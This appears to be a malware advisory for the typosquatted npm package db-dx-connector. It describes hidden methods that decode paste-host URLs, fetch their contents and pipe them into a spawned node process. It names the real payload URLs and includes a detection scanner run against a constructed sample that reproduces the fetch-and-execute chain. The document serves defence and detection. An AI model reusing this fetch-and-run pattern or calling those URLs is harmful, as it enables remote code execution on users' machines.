MAL-2026-5463
Malicious code in db-dx-connector (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b0a6cd3a84c38e801823eba4ccf0d4ff2a28f5955309bfb300f7f0f640b1a69b)

db-dx-connector is a name-transposition of the legitimate divblox package dx-db-connector (its package.json even points repository.url at github.com/divbloxjs/dx-db-connector, a repository it does not own).

Beyond mimicking the real connector's API, index.js (~line 242) exposes two methods, `queryDBConnect` and `queryDBErrorReply`, that base64-decode a hardcoded constant into a URL on the anonymous paste host jsonkeeper.com, fetch the paste body with axios, and pipe it to the stdin of a detached `spawn('node', [])` child process. The decoded endpoints are https://www.jsonkeeper.com/b/ZIAIK and https://jsonkeeper.com/b/L435A. Whoever controls those pastes can execute arbitrary Node.js code on any host that calls either method.

The base64 obfuscation of the URL constant, the use of a mutable third-party paste host, and the pipe-to-node sink are unambiguously attacker tradecraft: there is no legitimate database-connector reason for any of these primitives. Any consumer who fat-fingers the package name and exercises the connector triggers attacker-controlled RCE.
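The three indicators above (a base64-obfuscated URL constant, a `spawn('node', [])` sink fed over stdin, and a package name that disagrees with its own repository.url) are all cheap to check mechanically. The scanner below is an added example, not code from the advisory source or from either npm package. It runs over a constructed sample source and package.json that mimic the described shape; the sample is hypothetical and is not the real index.js, and the regexes are heuristics that a real triage tool would back with an AST pass.

```javascript
// Constructed sample (hypothetical, not the package's real source): the shape
// described in the advisory, beside a harmless base64 literal for contrast.
const SAMPLE_URL_B64 = Buffer.from('https://www.jsonkeeper.com/b/ZIAIK').toString('base64');
const HARMLESS_B64 = Buffer.from('not a url, just a label').toString('base64');
const SAMPLE_SOURCE = `
const axios = require('axios');
const { spawn } = require('child_process');
const ENDPOINT = '${SAMPLE_URL_B64}';
const LABEL = '${HARMLESS_B64}';
async function queryDBConnect() {
  const url = Buffer.from(ENDPOINT, 'base64').toString();
  const res = await axios.get(url);
  const child = spawn('node', [], { detached: true, stdio: ['pipe', 'ignore', 'ignore'] });
  child.stdin.end(String(res.data));
}
`;
// Constructed package.json fields mirroring the mismatch the advisory describes.
const SAMPLE_PKG = {
  name: 'db-dx-connector',
  repository: { type: 'git', url: 'git+https://github.com/divbloxjs/dx-db-connector.git' },
};

// Indicator 1: quoted base64 literals that decode to an http(s) URL.
function findBase64Urls(source) {
  const literal = /['"`]([A-Za-z0-9+\/]{16,}={0,2})['"`]/g;
  const hits = [];
  let m;
  while ((m = literal.exec(source)) !== null) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    // Round-trip filter: identifiers that merely fit the base64 alphabet re-encode differently.
    if (Buffer.from(decoded, 'utf8').toString('base64') !== m[1]) continue;
    if (/^https?:\/\/\S+$/.test(decoded)) hits.push({ literal: m[1], url: decoded });
  }
  return hits;
}

// Indicator 2: spawning `node` with no script argument, which only makes sense
// when the program is about to be written to the child's stdin.
function findNodeStdinSinks(source) {
  return source.match(/\b(?:spawn|execFile)\(\s*['"]node['"]\s*,\s*\[\s*\]/g) || [];
}

// Indicator 3: package name disagrees with the GitHub repository it claims to live in,
// and in particular is a reordering of that repository's hyphenated segments.
function segments(name) {
  return name.toLowerCase().split('-').sort().join('-');
}
function isSegmentTransposition(a, b) {
  return a !== b && segments(a) === segments(b);
}
function repoNameMismatch(pkg) {
  const url = (pkg.repository && pkg.repository.url) || '';
  const m = /github\.com[\/:]([^\/]+)\/([^\/.]+)/.exec(url);
  if (!m || m[2] === pkg.name) return null;
  return { name: pkg.name, repoName: m[2], transposition: isSegmentTransposition(pkg.name, m[2]) };
}

function assess(source, pkg) {
  const urls = findBase64Urls(source);
  const sinks = findNodeStdinSinks(source);
  const mismatch = repoNameMismatch(pkg);
  const indicators = [
    ...urls.map(h => `base64-obfuscated URL: ${h.url}`),
    ...sinks.map(s => `pipe-to-node sink: ${s}`),
    ...(mismatch ? [`repository.url names "${mismatch.repoName}", package is "${mismatch.name}"` +
                    (mismatch.transposition ? ' (segment transposition)' : '')] : []),
  ];
  // A fetched payload plus a pipe-to-node sink is the RCE chain itself; the name
  // mismatch corroborates typosquatting but is not needed to flag the code.
  return { flagged: urls.length > 0 && sinks.length > 0, indicators };
}

const report = assess(SAMPLE_SOURCE, SAMPLE_PKG);
console.log(JSON.stringify(report, null, 2));
```

Pointed at a real package, `assess` would take the contents of index.js and the parsed package.json; on the constructed sample it reports all three indicators and flags the code because the decoded URL and the stdin sink co-occur. The round-trip check in `findBase64Urls` keeps ordinary identifiers and short tokens from being decoded as base64, which is the usual source of noise in this kind of grep.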
Affected packages
No fixed version has been published for db-dx-connector (npm), and none should be expected: the package is a typosquat, so there is no known-safe version to pin. Remove it and install the intended package, dx-db-connector, instead.